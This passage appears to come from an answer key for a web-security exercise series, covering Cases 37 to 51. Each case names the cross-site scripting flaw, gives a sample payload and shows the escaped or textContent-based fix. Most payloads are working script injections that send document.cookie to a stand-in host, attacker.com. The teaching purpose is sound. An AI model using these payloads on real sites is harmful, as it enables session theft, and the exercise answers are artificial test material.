<pre class="highlight json"><code><span class="err">POST</span><span class="w"> </span><span class="err">/api/profile/attacker</span><span class="w"> </span><span class="err">Content-Type:</span><span class="w"> </span><span class="err">application/json</span><span class="w"> </span><span class="p">{</span><span class="nl">"bio"</span><span class="p">:</span><span class="w"> </span><span class="s2">"&lt;img src=x onerror=</span><span class="se">\"</span><span class="s2">fetch('https://attacker.com/?q='+document.cookie)</span><span class="se">\"</span><span class="s2">&gt;"</span><span class="p">}</span><span class="w"> </span></code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nf">useEffect</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">profile</span> <span class="o">&amp;&amp;</span> <span class="nx">bioRef</span><span class="p">.</span><span class="nx">current</span><span class="p">)</span> <span class="p">{</span> <span class="nx">bioRef</span><span class="p">.</span><span class="nx">current</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">profile</span><span class="p">.</span><span class="nx">bio</span><span class="p">;</span> <span class="p">}</span> <span class="p">},</span> <span class="p">[</span><span class="nx">profile</span><span class="p">]);</span> </code></pre> </div> <h3> Case 37 — Answer </h3> <ol> <li><p>Stored XSS. Missing escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">POST /ticket Content-Type: application/x-www-form-urlencoded title=attacker&amp;body=&lt;/div&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt;&lt;div&gt; </span></code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- tickets.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Support Tickets<span class="nt">&lt;/h1&gt;</span> {% for ticket in tickets %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"ticket"</span><span class="nt">&gt;</span> <span class="nt">&lt;h2&gt;</span>{{ ticket.title }}<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"body"</span><span class="nt">&gt;</span>{{ ticket.body }}<span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 38 — Answer </h3> <ol> <li><p>Reflected XSS. Wrong Context Escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">POST / Content-Type: application/x-www-form-urlencoded email=&lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&gt; </span></code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="k">def</span> <span class="nf">preferences</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">saved</span> <span class="o">=</span> <span class="bp">False</span> <span class="n">email</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">POST</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">email</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">:</span> <span class="n">saved</span> <span class="o">=</span> <span class="bp">True</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">preferences.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">email</span><span class="sh">"</span><span class="p">:</span> <span class="n">email</span><span class="p">,</span> <span class="sh">"</span><span class="s">saved</span><span class="sh">"</span><span class="p">:</span> <span class="n">saved</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- preferences.html --&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">showConfirmation</span><span class="p">(</span><span class="nx">email</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">banner</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">confirmation</span><span class="dl">"</span><span class="p">);</span> <span class="nx">banner</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`Preferences saved for: </span><span class="p">${</span><span class="nx">email</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> {% if saved %} <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"confirmation"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="nf">showConfirmation</span><span class="p">(</span><span class="dl">"</span><span class="s2">{{ email | escapejs }}</span><span class="dl">"</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> {% endif %} <span class="nt">&lt;/body&gt;</span> </code></pre> </div> <h3> Case 39 — Answer </h3> <ol> <li><p>Stored XSS. Misplaced Escaping. Although escaping is applied in the backend this can cause display issues.</p></li> <li><p>No serious XSS vulnerability but display issues.</p></li> <li><p>Fix:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/comment</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">add_comment</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="n">data</span> <span class="o">=</span> <span class="k">await</span> <span class="n">request</span><span class="p">.</span><span class="nf">json</span><span class="p">()</span> <span class="n">author</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">author</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">text</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">text</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">INSERT INTO comments (author, text) VALUES (?, ?)</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">author</span><span class="p">,</span> <span class="n">text</span><span class="p">)</span> <span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">saved</span><span class="sh">"</span><span class="p">}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/comments</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">view_comments</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">rows_data</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT author, text FROM comments</span><span class="sh">"</span><span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span><span class="sh">"</span><span class="s">rows.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">rows_data</span><span class="sh">"</span><span class="p">:</span> <span class="n">rows_data</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!--rows.html--&gt;</span> <span class="nt">&lt;table&gt;</span> <span class="nt">&lt;thead&gt;&lt;tr&gt;&lt;th&gt;</span>Author<span class="nt">&lt;/th&gt;&lt;th&gt;</span>Comment<span class="nt">&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;</span> <span class="nt">&lt;tbody&gt;</span> {% for c in rows_data %} <span class="nt">&lt;tr&gt;</span> <span class="nt">&lt;td&gt;</span>{{ c.author }}<span class="nt">&lt;/td&gt;</span> <span class="nt">&lt;td&gt;</span>{{ c.text }}<span class="nt">&lt;/td&gt;</span> <span class="nt">&lt;/tr&gt;</span> {% endfor %} <span class="nt">&lt;/tbody&gt;</span> <span class="nt">&lt;/table&gt;</span> </code></pre> </div> <h3> Case 40 — Answer </h3> <ol> <li><p>Stored XSS. Wrong Context escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">POST /review Content-Type: application/x-www-form-urlencoded username=&lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&gt;&amp;review=x </span></code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- reviews.html --&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">highlightUser</span><span class="p">(</span><span class="nx">username</span><span class="p">)</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">welcome</span><span class="dl">"</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`Welcome back, </span><span class="p">${</span><span class="nx">username</span><span class="p">}</span><span class="s2">!`</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> {% for review in reviews %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"review"</span><span class="nt">&gt;</span> <span class="nt">&lt;strong&gt;</span>{{ review.username }}<span class="nt">&lt;/strong&gt;</span> <span class="nt">&lt;p&gt;</span>{{ review.review }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;script&gt;</span><span class="nf">highlightUser</span><span class="p">({{</span> <span class="nx">review</span><span class="p">.</span><span class="nx">username</span> <span class="o">|</span> <span class="nx">tojson</span> <span class="p">}});</span><span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} <span class="nt">&lt;/body&gt;</span> </code></pre> </div> <h3> Case 41 — Answer </h3> <ol> <li><p>Stored XSS. Missing Escaping.</p></li> <li><p>SQL row entry payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>user.username: attacker user.bio: &lt;/div&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt;&lt;div&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- profile.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>{{ user.username }}'s Profile<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"bio"</span><span class="nt">&gt;</span>{{ user.bio }}<span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 42 — Answer </h3> <ol> <li><p>Technically the code does succeed in defending against XSS but it can cause display errors.</p></li> <li><p>No relevant payload. Just issues with display errors.</p></li> <li><p>Fix:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/event</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">add_event</span><span class="p">():</span> <span class="n">title</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">title</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">description</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">description</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">INSERT INTO events (title, description) VALUES (?, ?)</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">title</span><span class="p">,</span> <span class="n">description</span><span class="p">)</span> <span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Event added.</span><span class="sh">"</span> </code></pre> </div> <h3> Case 43 — Answer </h3> <ol> <li><p>Stored XSS. Missing Escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">POST / Content-Type: application/x-www-form-urlencoded body=&lt;/p&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt;&lt;p&gt;&amp;author=x </span></code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- forum.html --&gt;</span> {% for post in posts %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"post"</span><span class="nt">&gt;</span> <span class="nt">&lt;strong&gt;</span>{{ post.author }}<span class="nt">&lt;/strong&gt;</span> <span class="nt">&lt;p&gt;</span>{{ post.body }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} </code></pre> </div> <h3> Case 44 — Answer </h3> <ol> <li><p>Stored XSS. Missing Escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="err">POST</span><span class="w"> </span><span class="err">/comment</span><span class="w"> </span><span class="err">Content-Type:</span><span class="w"> </span><span class="err">application/json</span><span class="w"> </span><span class="p">{</span><span class="nl">"author"</span><span class="p">:</span><span class="w"> </span><span class="s2">"&lt;/strong&gt;&lt;strong&gt;"</span><span class="p">,</span><span class="w"> </span><span class="nl">"body"</span><span class="p">:</span><span class="w"> </span><span class="s2">"&lt;/p&gt;&lt;img src=x onerror=</span><span class="se">\"</span><span class="s2">fetch('https://attacker.com/?q='+document.cookie)</span><span class="se">\"</span><span class="s2">&gt;&lt;p&gt;"</span><span class="p">}</span><span class="w"> </span></code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- comments.html --&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">renderComment</span><span class="p">(</span><span class="nx">author</span><span class="p">,</span> <span class="nx">body</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">div</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">div</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">strong</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">strong</span><span class="dl">'</span><span class="p">);</span> <span class="nx">strong</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="nx">author</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">p</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">);</span> <span class="nx">p</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="nx">body</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="nx">div</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">strong</span><span class="p">);</span> <span class="nx">div</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">p</span><span class="p">);</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">comments</span><span class="dl">"</span><span class="p">).</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">div</span><span class="p">);</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <h3> Case 45 — Answer </h3> <ol> <li><p>Reflected XSS. Wrong context escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?user=") ; fetch('https://attacker.com/?q='+document.cookie);// </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- dashboard.html --&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="nf">initDashboard</span><span class="p">({{</span> <span class="nx">username</span> <span class="o">|</span> <span class="nx">tojson</span> <span class="p">}},</span> <span class="p">{{</span> <span class="nx">role</span> <span class="o">|</span> <span class="nx">tojson</span> <span class="p">}});</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <h3> Case 46 — Answer </h3> <ol> <li><p>DOM XSS. Missing escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>msg.author: "" msg.text: "&lt;img src=x onerror=\"fetch('https://attacker.com/?q='+document.cookie)\"&gt;" </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">data</span><span class="p">.</span><span class="nx">messages</span><span class="p">.</span><span class="nf">forEach</span><span class="p">(</span><span class="nx">msg</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">div</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">"</span><span class="s2">div</span><span class="dl">"</span><span class="p">);</span> <span class="nx">div</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="nx">msg</span><span class="p">.</span><span class="nx">author</span><span class="p">}</span><span class="s2">: </span><span class="p">${</span><span class="nx">msg</span><span class="p">.</span><span class="nx">text</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="nx">chatWindow</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">div</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <h3> Case 47 — Answer </h3> <ol> <li><p>Reflected XSS. Wrong context escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>?q="); fetch('https://attacker.com/?q='+document.cookie); // </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">search.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">query</span><span class="sh">"</span><span class="p">:</span> <span class="n">query</span><span class="p">,</span> <span class="sh">"</span><span class="s">results</span><span class="sh">"</span><span class="p">:</span> <span class="n">results</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;script&gt;</span> <span class="nf">trackSearch</span><span class="p">(</span><span class="dl">"</span><span class="s2">{{ query | escapejs }}</span><span class="dl">"</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <h3> Case 48 — Answer </h3> <ol> <li><p>Stored XSS. Missing escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="err">POST</span><span class="w"> </span><span class="err">/article</span><span class="w"> </span><span class="err">Content-Type:</span><span class="w"> </span><span class="err">application/json</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"title"</span><span class="p">:</span><span class="w"> </span><span class="s2">"&lt;/h2&gt;&lt;h2&gt;"</span><span class="p">,</span><span class="w"> </span><span class="nl">"summary"</span><span class="p">:</span><span class="w"> </span><span class="s2">"&lt;/p&gt;&lt;p&gt;"</span><span class="p">,</span><span class="w"> </span><span class="nl">"author"</span><span class="p">:</span><span class="w"> </span><span class="s2">"attacker&lt;/small&gt;&lt;img src=x onerror=</span><span class="se">\"</span><span class="s2">fetch('https://attacker.com/?q='+document.cookie)</span><span class="se">\"</span><span class="s2">&gt;&lt;small&gt;"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">function</span> <span class="nf">loadArticle</span><span class="p">(</span><span class="nx">title</span><span class="p">,</span> <span class="nx">summary</span><span class="p">,</span> <span class="nx">author</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">container</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">article-view</span><span class="dl">"</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">h2</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">h2</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">p</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">small</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">small</span><span class="dl">'</span><span class="p">);</span> <span class="nx">h2</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="nx">title</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="nx">p</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="nx">summary</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="nx">small</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`By </span><span class="p">${</span><span class="nx">author</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="nx">container</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">h2</span><span class="p">);</span> <span class="nx">container</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">p</span><span class="p">);</span> <span class="nx">container</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">small</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h3> Case 49 — Answer </h3> <ol> <li><p>No vulnerability. Just display issues.</p></li> <li><p>No relevant payload.</p></li> <li><p>Fix:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">messages</span> <span class="o">=</span> <span class="p">[</span><span class="n">row</span><span class="p">[</span><span class="sh">'</span><span class="s">message</span><span class="sh">'</span><span class="p">]</span> <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">rows</span><span class="p">]</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">notifications.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">messages</span><span class="sh">"</span><span class="p">:</span> <span class="n">messages</span><span class="p">})</span> </code></pre> </div> <h3> Case 50 — Answer </h3> <ol> <li><p>Reflected XSS. Missing Escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?filter='); fetch('https://attacker.com/?q='+document.cookie) </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;button</span> <span class="na">onclick=</span><span class="s">"applyFilter({{ filter | tojson }})"</span><span class="nt">&gt;</span>Refresh Filter<span class="nt">&lt;/button&gt;</span> </code></pre> </div> <h3> Case 51 — Answer </h3> <ol> <li><p>DOM XSS. Missing escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"employees"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"id"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"&lt;/h3&gt;&lt;img src=x onerror=</span><span class="se">\"</span><span class="s2">fetch('https://attacker.com/?q='+document.cookie)</span><span class="se">\"</span><span class="s2">&gt;&lt;h3&gt;"</span><span class="p">,</span><span class="w"> </span><span class="nl">"role"</span><span class="p">:</span><span class="w"> </span><span class="s2">"&lt;/p&gt;&lt;img src=x onerror=</span><span class="se">\"</span><span class="s2">fetch('https://attacker.com/?q='+document.cookie)</span><span class="se">\"</span><span class="s2">&gt;&lt;p&gt;"</span><span class="p">,</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:</span><span class="w"> </span><span class="s2">"attacker@attacker.com</span><span class="se">\"</span><span class="s2"> onclick=</span><span class="se">\"</span><span class="s2">fetch('https://attacker.com/?q='+document.cookie)</span><span class="se">\"</span><span class="s2">"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">data</span><span class="p">.</span><span class="nx">employees</span><span class="p">.</span><span class="nf">forEach</span><span class="p">(</span><span class="nx">emp</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">card</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">"</span><span class="s2">div</span><span class="dl">"</span><span class="p">);</span> <span class="nx">card</span><span class="p">.</span><span class="nf">setAttribute</span><span class="p">(</span><span class="dl">"</span><span class="s2">data-id</span><span class="dl">"</span><span class="p">,</span> <span class="nx">emp</span><span class="p">.</span><span class="nx">id</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">name</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">h3</span><span class="dl">'</span><span class="p">);</span> <span class="nx">name</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="nx">emp</span><span class="p">.</span><span class="nx">name</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">role</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">);</span> <span class="nx">role</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="nx">emp</span><span class="p">.</span><span class="nx">role</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">email</span> <span class="o">=</span> <span class="nb">document</span><span 